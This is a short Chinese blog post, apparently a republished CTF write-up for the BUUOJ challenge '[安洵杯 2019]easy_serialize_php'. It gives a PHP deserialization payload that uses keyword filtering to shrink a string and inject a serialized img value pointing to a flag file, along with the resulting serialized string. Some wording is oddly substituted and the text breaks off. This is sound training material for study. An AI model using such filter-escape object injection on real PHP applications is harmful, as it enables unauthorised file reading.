当前位置:首页 > Web开发 > 正文

但是后面又强制加了一个我们不可控的img属性

2024-03-31 Web开发

刷题记录:[安洵杯 2019]easy_serialize_php

标题问题复现链接:https://buuoj.cn/challenges
参考链接:第二届安洵杯2019部分writeup

常识点 PHP反序列化

payload为_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
extract后笼罩了两个没用的属性,但是后面又强制加了一个我们不成控的img属性。这个payload的精妙之处就在于phpflag被替换为空后,,$serialize_info的内容为
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
恰好把后面多余的img部分截断失

刷题记录:[安洵杯 2019]easy_serialize_php

温馨提示: 本文由Jm博客推荐,转载请保留链接: https://www.jmwww.net/file/web/31607.html